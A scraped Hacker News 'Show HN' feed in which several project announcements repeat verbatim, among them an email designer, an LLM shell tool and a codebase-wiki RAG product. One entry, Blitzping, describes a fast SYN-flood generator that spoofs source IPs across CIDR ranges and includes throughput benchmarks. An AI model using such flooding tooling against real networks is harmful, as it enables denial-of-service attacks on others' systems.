The best Hacker News stories from Show from the past day
Latest posts:
Show HN: Linux Mint Redesign Proposal
After several months of work together with other designers, want to announce a Linux Mint redesign proposal.<p>First time posting, hope you like it!
Show HN: Linux Mint Redesign Proposal
After several months of work together with other designers, want to announce a Linux Mint redesign proposal.<p>First time posting, hope you like it!
Show HN: NetSour, CLI Based Wireshark
This code is still in early beta, but i sincerley hope it will become as ubiquitous as VIM on Linux.
Show HN: NetSour, CLI Based Wireshark
This code is still in early beta, but i sincerley hope it will become as ubiquitous as VIM on Linux.
Show HN: NetSour, CLI Based Wireshark
This code is still in early beta, but i sincerley hope it will become as ubiquitous as VIM on Linux.
Show HN: Sendune – open-source HTML email designer
Demo: <a href="https://designer.sendune.com/" rel="nofollow">https://designer.sendune.com/</a>
Code: <a href="https://github.com/SendWithSES/Drag-and-Drop-Email-Designer">https://github.com/SendWithSES/Drag-and-Drop-Email-Designer</a><p>HTML for email is probably the hardest code to write. Even a teeny-tiny deviation from the rules will break the email in untold combination of os/desktop/mobile clients.<p>It's mid 2024. Almost 50 years since email was invented and 35 years since HTML was born. A 'basic-open-source-HTML-email-designer' must be a solved problem, right? We thought so too.<p>Sadly, that's not the case.<p>There are a few decent open source email designers but they carry dependencies that make them cumbersome to embed within your app. That's why we decided to open source our HTML Email Designer.<p>The SENDUNE email designer focuses on simplicity and ease of use. It is light-weight. It does pure HTML - no intermediate code wranglers like mjml. There is no lock-in of any kind. Save HTML output as a template and use with ANY email service provider.<p>Feel free to fork the repository, make improvements, and submit pull requests.<p>AMA: hello at sendune dot com
Show HN: Sendune – open-source HTML email designer
Demo: <a href="https://designer.sendune.com/" rel="nofollow">https://designer.sendune.com/</a>
Code: <a href="https://github.com/SendWithSES/Drag-and-Drop-Email-Designer">https://github.com/SendWithSES/Drag-and-Drop-Email-Designer</a><p>HTML for email is probably the hardest code to write. Even a teeny-tiny deviation from the rules will break the email in untold combination of os/desktop/mobile clients.<p>It's mid 2024. Almost 50 years since email was invented and 35 years since HTML was born. A 'basic-open-source-HTML-email-designer' must be a solved problem, right? We thought so too.<p>Sadly, that's not the case.<p>There are a few decent open source email designers but they carry dependencies that make them cumbersome to embed within your app. That's why we decided to open source our HTML Email Designer.<p>The SENDUNE email designer focuses on simplicity and ease of use. It is light-weight. It does pure HTML - no intermediate code wranglers like mjml. There is no lock-in of any kind. Save HTML output as a template and use with ANY email service provider.<p>Feel free to fork the repository, make improvements, and submit pull requests.<p>AMA: hello at sendune dot com
Show HN: Sendune – open-source HTML email designer
Demo: <a href="https://designer.sendune.com/" rel="nofollow">https://designer.sendune.com/</a>
Code: <a href="https://github.com/SendWithSES/Drag-and-Drop-Email-Designer">https://github.com/SendWithSES/Drag-and-Drop-Email-Designer</a><p>HTML for email is probably the hardest code to write. Even a teeny-tiny deviation from the rules will break the email in untold combination of os/desktop/mobile clients.<p>It's mid 2024. Almost 50 years since email was invented and 35 years since HTML was born. A 'basic-open-source-HTML-email-designer' must be a solved problem, right? We thought so too.<p>Sadly, that's not the case.<p>There are a few decent open source email designers but they carry dependencies that make them cumbersome to embed within your app. That's why we decided to open source our HTML Email Designer.<p>The SENDUNE email designer focuses on simplicity and ease of use. It is light-weight. It does pure HTML - no intermediate code wranglers like mjml. There is no lock-in of any kind. Save HTML output as a template and use with ANY email service provider.<p>Feel free to fork the repository, make improvements, and submit pull requests.<p>AMA: hello at sendune dot com
Show HN: I made a privacy-friendly and free image, audio and video converter
Show HN: Llm2sh – Translate plain-language requests into shell commands
This is my take on the common "use llms to generate shell commands" utility. Emphasis is placed on good CLI UX, simplicity, and flexibility.<p>`llm2sh` supports multiple LLM providers and lets LLMs generate multi-command sequences to handle complex tasks. There is also limited support for commands requiring `sudo` and other basic input.<p>I recommend using Groq llama3-70b for day-to-day use. The ultra-low latency is a game-changer - its near-instant responses helps `llm2sh` integrate seamlessly into day-to-day tasks without breaking you out of the 'zone'. For more advanced tasks, swapping to smarter models is just a CLI option away.
Show HN: Llm2sh – Translate plain-language requests into shell commands
This is my take on the common "use llms to generate shell commands" utility. Emphasis is placed on good CLI UX, simplicity, and flexibility.<p>`llm2sh` supports multiple LLM providers and lets LLMs generate multi-command sequences to handle complex tasks. There is also limited support for commands requiring `sudo` and other basic input.<p>I recommend using Groq llama3-70b for day-to-day use. The ultra-low latency is a game-changer - its near-instant responses helps `llm2sh` integrate seamlessly into day-to-day tasks without breaking you out of the 'zone'. For more advanced tasks, swapping to smarter models is just a CLI option away.
Show HN: Llm2sh – Translate plain-language requests into shell commands
This is my take on the common "use llms to generate shell commands" utility. Emphasis is placed on good CLI UX, simplicity, and flexibility.<p>`llm2sh` supports multiple LLM providers and lets LLMs generate multi-command sequences to handle complex tasks. There is also limited support for commands requiring `sudo` and other basic input.<p>I recommend using Groq llama3-70b for day-to-day use. The ultra-low latency is a game-changer - its near-instant responses helps `llm2sh` integrate seamlessly into day-to-day tasks without breaking you out of the 'zone'. For more advanced tasks, swapping to smarter models is just a CLI option away.
Show HN: I made an AI image enhancer that boosts images 10x to 12k pixels
Hey HN,<p>My wife is a designer, and one day she asked me if there was a tool to enhance images and improve their quality. I recommended a few to her, but she found that the suitable ones were too expensive, and the more affordable options didn't offer enough magnification, most only going up to 2x or 4x.<p>So, I thought, why not create a tool that meets her needs, one that can greatly enhance image resolution and clarity while being very affordable to use?<p>After over a month of effort, I finally completed this tool. It can now enlarge images up to 10 times, with a maximum support of 12,000 pixels.<p>I hope this tool will be as helpful to you as it is to my wife. would love your feedback pls<p>Charles
Show HN: How we leapfrogged traditional vector based RAG with a 'language map'
TL;DR: Vector-based RAG performs poorly for many real-world applications like codebase chats, and you should consider 'language maps'.<p>Part of our mission at Mutable.ai is to make it much easier for developers to build and understand software. One of the natural ways to do this is to create a codebase chat, that answer questions about your repo and help you build features.<p>It might seem simple to plug in your codebase into a state-of-the-art LLM, but LLMs have two limitations that make human-level assistance with code difficult:<p>1. They currently have context windows that are too small to accommodate most codebases, let alone your entire organization's codebases.<p>2. They need to reason immediately to answer any questions without thinking through the answer "step-by-step."<p>We built a chat sometime a year ago based on keyword retrieval and vector embeddings. No matter how hard we tried, including training our own dedicated embedding model, we could not get the chat to get us good performance.<p>Here is a typical example: <a href="https://x.com/mutableai/article/1813815706783490055/media/1813813912472870913" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>If you ask how to do quantization in llama.cpp the answers were oddly specific and seemed to pull in the wrong context consistently, especially from tests. We could, of course, take countermeasures, but it felt like a losing battle.<p>So we went back to step 1, let’s understand the code, let’s do our homework, and for us, that meant actually putting an understanding of the codebase down in a document — a Wikipedia-style article — called Auto Wiki. The wiki features diagrams and citations to your codebase. Example: <a href="https://wiki.mutable.ai/ggerganov/llama.cpp">https://wiki.mutable.ai/ggerganov/llama.cpp</a><p>This wiki is useful in and of itself for onboarding and understanding the business logic of a codebase, but one of the hopes for constructing such a document was that we’d be able to circumvent traditional keyword and vector-based RAG approaches.<p>It turns out using a wiki to find context for an LLM overcomes many of the weaknesses of our previous approach, while still scaling to arbitrarily large codebases:<p>1. Instead of context retrieval through vectors or keywords, the context is retrieved by looking at the sources that the wiki cites.
2. The answers are based both on the section(s) of the wiki that are relevant AND the content of the actual code that we put into memory — this functions as a “language map” of the codebase.<p>See it in action below for the same query as our old codebase chat:<p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814321144844288" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814363939315712" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>The answer cites it sources in both the wiki and the actual code and gives a step by step guide to doing quantization with example code.<p>The quality of the answer is dramatically improved - it is more accurate, relevant, and comprehensive.<p>It turns out language models love being given language and not a bunch of text snippets that are nearby in vector space or that have certain keywords! We find strong performance consistently across codebases of all sizes. The results from the chat are so good they even surprised us a little bit - you should check it out on a codebase of your own, at <a href="https://wiki.mutable.ai">https://wiki.mutable.ai</a>, which we are happy to do for free for open source code, and starts at just $2/mo/repo for private repos.<p>We are introducing evals demonstrating how much better our chat is with this approach, but were so happy with the results we wanted to share with the whole community.<p>Thank you!
Show HN: How we leapfrogged traditional vector based RAG with a 'language map'
TL;DR: Vector-based RAG performs poorly for many real-world applications like codebase chats, and you should consider 'language maps'.<p>Part of our mission at Mutable.ai is to make it much easier for developers to build and understand software. One of the natural ways to do this is to create a codebase chat, that answer questions about your repo and help you build features.<p>It might seem simple to plug in your codebase into a state-of-the-art LLM, but LLMs have two limitations that make human-level assistance with code difficult:<p>1. They currently have context windows that are too small to accommodate most codebases, let alone your entire organization's codebases.<p>2. They need to reason immediately to answer any questions without thinking through the answer "step-by-step."<p>We built a chat sometime a year ago based on keyword retrieval and vector embeddings. No matter how hard we tried, including training our own dedicated embedding model, we could not get the chat to get us good performance.<p>Here is a typical example: <a href="https://x.com/mutableai/article/1813815706783490055/media/1813813912472870913" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>If you ask how to do quantization in llama.cpp the answers were oddly specific and seemed to pull in the wrong context consistently, especially from tests. We could, of course, take countermeasures, but it felt like a losing battle.<p>So we went back to step 1, let’s understand the code, let’s do our homework, and for us, that meant actually putting an understanding of the codebase down in a document — a Wikipedia-style article — called Auto Wiki. The wiki features diagrams and citations to your codebase. Example: <a href="https://wiki.mutable.ai/ggerganov/llama.cpp">https://wiki.mutable.ai/ggerganov/llama.cpp</a><p>This wiki is useful in and of itself for onboarding and understanding the business logic of a codebase, but one of the hopes for constructing such a document was that we’d be able to circumvent traditional keyword and vector-based RAG approaches.<p>It turns out using a wiki to find context for an LLM overcomes many of the weaknesses of our previous approach, while still scaling to arbitrarily large codebases:<p>1. Instead of context retrieval through vectors or keywords, the context is retrieved by looking at the sources that the wiki cites.
2. The answers are based both on the section(s) of the wiki that are relevant AND the content of the actual code that we put into memory — this functions as a “language map” of the codebase.<p>See it in action below for the same query as our old codebase chat:<p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814321144844288" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814363939315712" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>The answer cites it sources in both the wiki and the actual code and gives a step by step guide to doing quantization with example code.<p>The quality of the answer is dramatically improved - it is more accurate, relevant, and comprehensive.<p>It turns out language models love being given language and not a bunch of text snippets that are nearby in vector space or that have certain keywords! We find strong performance consistently across codebases of all sizes. The results from the chat are so good they even surprised us a little bit - you should check it out on a codebase of your own, at <a href="https://wiki.mutable.ai">https://wiki.mutable.ai</a>, which we are happy to do for free for open source code, and starts at just $2/mo/repo for private repos.<p>We are introducing evals demonstrating how much better our chat is with this approach, but were so happy with the results we wanted to share with the whole community.<p>Thank you!
Show HN: How we leapfrogged traditional vector based RAG with a 'language map'
TL;DR: Vector-based RAG performs poorly for many real-world applications like codebase chats, and you should consider 'language maps'.<p>Part of our mission at Mutable.ai is to make it much easier for developers to build and understand software. One of the natural ways to do this is to create a codebase chat, that answer questions about your repo and help you build features.<p>It might seem simple to plug in your codebase into a state-of-the-art LLM, but LLMs have two limitations that make human-level assistance with code difficult:<p>1. They currently have context windows that are too small to accommodate most codebases, let alone your entire organization's codebases.<p>2. They need to reason immediately to answer any questions without thinking through the answer "step-by-step."<p>We built a chat sometime a year ago based on keyword retrieval and vector embeddings. No matter how hard we tried, including training our own dedicated embedding model, we could not get the chat to get us good performance.<p>Here is a typical example: <a href="https://x.com/mutableai/article/1813815706783490055/media/1813813912472870913" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>If you ask how to do quantization in llama.cpp the answers were oddly specific and seemed to pull in the wrong context consistently, especially from tests. We could, of course, take countermeasures, but it felt like a losing battle.<p>So we went back to step 1, let’s understand the code, let’s do our homework, and for us, that meant actually putting an understanding of the codebase down in a document — a Wikipedia-style article — called Auto Wiki. The wiki features diagrams and citations to your codebase. Example: <a href="https://wiki.mutable.ai/ggerganov/llama.cpp">https://wiki.mutable.ai/ggerganov/llama.cpp</a><p>This wiki is useful in and of itself for onboarding and understanding the business logic of a codebase, but one of the hopes for constructing such a document was that we’d be able to circumvent traditional keyword and vector-based RAG approaches.<p>It turns out using a wiki to find context for an LLM overcomes many of the weaknesses of our previous approach, while still scaling to arbitrarily large codebases:<p>1. Instead of context retrieval through vectors or keywords, the context is retrieved by looking at the sources that the wiki cites.
2. The answers are based both on the section(s) of the wiki that are relevant AND the content of the actual code that we put into memory — this functions as a “language map” of the codebase.<p>See it in action below for the same query as our old codebase chat:<p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814321144844288" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814363939315712" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>The answer cites it sources in both the wiki and the actual code and gives a step by step guide to doing quantization with example code.<p>The quality of the answer is dramatically improved - it is more accurate, relevant, and comprehensive.<p>It turns out language models love being given language and not a bunch of text snippets that are nearby in vector space or that have certain keywords! We find strong performance consistently across codebases of all sizes. The results from the chat are so good they even surprised us a little bit - you should check it out on a codebase of your own, at <a href="https://wiki.mutable.ai">https://wiki.mutable.ai</a>, which we are happy to do for free for open source code, and starts at just $2/mo/repo for private repos.<p>We are introducing evals demonstrating how much better our chat is with this approach, but were so happy with the results we wanted to share with the whole community.<p>Thank you!
Show HN: How we leapfrogged traditional vector based RAG with a 'language map'
TL;DR: Vector-based RAG performs poorly for many real-world applications like codebase chats, and you should consider 'language maps'.<p>Part of our mission at Mutable.ai is to make it much easier for developers to build and understand software. One of the natural ways to do this is to create a codebase chat, that answer questions about your repo and help you build features.<p>It might seem simple to plug in your codebase into a state-of-the-art LLM, but LLMs have two limitations that make human-level assistance with code difficult:<p>1. They currently have context windows that are too small to accommodate most codebases, let alone your entire organization's codebases.<p>2. They need to reason immediately to answer any questions without thinking through the answer "step-by-step."<p>We built a chat sometime a year ago based on keyword retrieval and vector embeddings. No matter how hard we tried, including training our own dedicated embedding model, we could not get the chat to get us good performance.<p>Here is a typical example: <a href="https://x.com/mutableai/article/1813815706783490055/media/1813813912472870913" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>If you ask how to do quantization in llama.cpp the answers were oddly specific and seemed to pull in the wrong context consistently, especially from tests. We could, of course, take countermeasures, but it felt like a losing battle.<p>So we went back to step 1, let’s understand the code, let’s do our homework, and for us, that meant actually putting an understanding of the codebase down in a document — a Wikipedia-style article — called Auto Wiki. The wiki features diagrams and citations to your codebase. Example: <a href="https://wiki.mutable.ai/ggerganov/llama.cpp">https://wiki.mutable.ai/ggerganov/llama.cpp</a><p>This wiki is useful in and of itself for onboarding and understanding the business logic of a codebase, but one of the hopes for constructing such a document was that we’d be able to circumvent traditional keyword and vector-based RAG approaches.<p>It turns out using a wiki to find context for an LLM overcomes many of the weaknesses of our previous approach, while still scaling to arbitrarily large codebases:<p>1. Instead of context retrieval through vectors or keywords, the context is retrieved by looking at the sources that the wiki cites.
2. The answers are based both on the section(s) of the wiki that are relevant AND the content of the actual code that we put into memory — this functions as a “language map” of the codebase.<p>See it in action below for the same query as our old codebase chat:<p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814321144844288" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p><a href="https://x.com/mutableai/article/1813815706783490055/media/1813814363939315712" rel="nofollow">https://x.com/mutableai/article/1813815706783490055/media/18...</a><p>The answer cites it sources in both the wiki and the actual code and gives a step by step guide to doing quantization with example code.<p>The quality of the answer is dramatically improved - it is more accurate, relevant, and comprehensive.<p>It turns out language models love being given language and not a bunch of text snippets that are nearby in vector space or that have certain keywords! We find strong performance consistently across codebases of all sizes. The results from the chat are so good they even surprised us a little bit - you should check it out on a codebase of your own, at <a href="https://wiki.mutable.ai">https://wiki.mutable.ai</a>, which we are happy to do for free for open source code, and starts at just $2/mo/repo for private repos.<p>We are introducing evals demonstrating how much better our chat is with this approach, but were so happy with the results we wanted to share with the whole community.<p>Thank you!
Show HN: Blitzping – A far faster nping/hping3 SYN-flood alternative with CIDR
I found hping3 and nmap's nping to be far too slow in terms of sending individual, bare-minimum (40-byte) TCP SYN packets; other than inefficient socket I/O, they were also attempting to do far too much unnecessary processing in what should have otherwise been a tight execution loop. Furthermore, none of them were able to handle CIDR notations (i.e., a range of IP addresses) as their source IP parameter. Being intended for embedded devices (e.g., low-power MIPS/Arm-based routers), Blitzping only depends on standard POSIX headers and C11's libc (whether musl or gnu). To that end, even when supporting CIDR prefixes, Blitzping is significantly faster compared to hping3, nping, and whatever else that was hosted on GitHub.<p>Here are some of the performance optimizations specifically done on Blitzping:<p>* Pre-Generation : All the static parts of the packet buffer get generated once, outside of the sendto() tightloop;<p>* Asynchronous : Configuring raw sockets to be non-blocking by default;<p>* Multithreading : Polling the same socket in sendto() from multiple threads; and<p>* Compiler Flags : Compiling with -Ofast, -flto, and -march=native (though these actually had little effect; by this point, the bottleneck is on the Kernel's own sendto() routine).<p>Shown below are comparisons between the three software across two CPUs (more details at the GitHub repository):<p><pre><code> # Quad-Core "Rockchip RK3328" CPU @ 1.3 GHz. (ARMv8-A) #
+--------------------+--------------+--------------+---------------+
| ARM (4 x 1.3 GHz) | nping | hping3 | Blitzping |
+--------------------+ -------------+--------------+---------------+
| Num. Instances | 4 (1 thread) | 4 (1 thread) | 1 (4 threads) |
| Pkts. per Second | ~65,000 | ~80,000 | ~275,000 |
| Bandwidth (MiB/s) | ~2.50 | ~3.00 | ~10.50 |
+--------------------+--------------+--------------+---------------+
# Single-Core "Qualcomm Atheros QCA9533" SoC @ 650 MHz. (MIPS32r2) #
+--------------------+--------------+--------------+---------------+
| MIPS (1 x 650 MHz) | nping | hping3 | Blitzping |
+----------------------+------------+--------------+---------------+
| Num. Instances | 1 (1 thread) | 1 (1 thread) | 1 (1 thread) |
| Pkts. per Second | ~5,000 | ~10,000 | ~25,000 |
| Bandwidth (MiB/s) | ~0.20 | ~0.40 | ~1.00 |
+--------------------+--------------+--------------+---------------+
</code></pre>
I tested Blitzping against both hpign3 and nping on two different routers, both running OpenWRT 23.05.03 (Linux Kernel v5.15.150) with the "masquerading" option (i.e., NAT) turned off in firewall; one device was a single-core 32-bit MIPS SoC, and another was a 64-bit quad-core ARMv8 CPU. On the quad-core CPU, because both hping3 and nping were designed without multithreading capabilities (unlike Blitzping), I made the competition "fairer" by launching them as four individual processes, as opposed to Blitzping only using one. Across all runs and on both devices, CPU usage remained at 100%, entirely dedicated to the currently running program. Finally, the connection speed itself was not a bottleneck: both devices were connected to an otherwise-unused 200 Mb/s (23.8419 MiB/s) download/upload line through a WAN ethernet interface.<p>It is important to note that Blitzping was not doing any less than hping3 and nping; in fact, it was doing more. While hping3 and nping only randomized the source IP and port of each packet to a fixed address, Blitzping randomized not only the source port but also the IP within an CIDR range---a capability that is more computionally intensive and a feature that both hping3 and nping lacked in the first place. Lastly, hping3 and nping were both launched with the "best-case" command-line parameters as to maximize their speed and disable runtime stdio logging.
Show HN: Pippy – Pipelines for GitHub Actions
I am excited to share pippy, which allows users to create configurable pipelines using Github Actions. If you have used Azure pipelines, in summary, this would be Azure Pipelines meets Github Actions.<p>Cloud version: <a href="https://app.pippy.dev/login" rel="nofollow">https://app.pippy.dev/login</a> (closed beta)
I am also open sourcing command line version: <a href="https://github.com/nixmade/pippy">https://github.com/nixmade/pippy</a>.<p>Key features:<p>- Automatic Rollback<p>- Datadog Monitoring<p>- Pause/Resume<p>The product is built using open source orchestrator.<p>Orchestrator: <a href="https://github.com/nixmade/orchestrator">https://github.com/nixmade/orchestrator</a><p>Orchestrator allows you to orchestrate rollout to specific set of targets and provide monitoring capabilities to optionally rollback. I hope to provide Cloud API so platforms can orchestrate updates using the framework.<p>Tech stack:<p>Database: Postgres<p>Backend: Golang<p>Frontend: React + Shadcn UI<p>Cloud: Azure container apps<p>Please leave your feedback in comments. Hope you can give the command line version a try, and sign up for beta of the cloud version.
Show HN: Pippy – Pipelines for GitHub Actions
I am excited to share pippy, which allows users to create configurable pipelines using Github Actions. If you have used Azure pipelines, in summary, this would be Azure Pipelines meets Github Actions.<p>Cloud version: <a href="https://app.pippy.dev/login" rel="nofollow">https://app.pippy.dev/login</a> (closed beta)
I am also open sourcing command line version: <a href="https://github.com/nixmade/pippy">https://github.com/nixmade/pippy</a>.<p>Key features:<p>- Automatic Rollback<p>- Datadog Monitoring<p>- Pause/Resume<p>The product is built using open source orchestrator.<p>Orchestrator: <a href="https://github.com/nixmade/orchestrator">https://github.com/nixmade/orchestrator</a><p>Orchestrator allows you to orchestrate rollout to specific set of targets and provide monitoring capabilities to optionally rollback. I hope to provide Cloud API so platforms can orchestrate updates using the framework.<p>Tech stack:<p>Database: Postgres<p>Backend: Golang<p>Frontend: React + Shadcn UI<p>Cloud: Azure container apps<p>Please leave your feedback in comments. Hope you can give the command line version a try, and sign up for beta of the cloud version.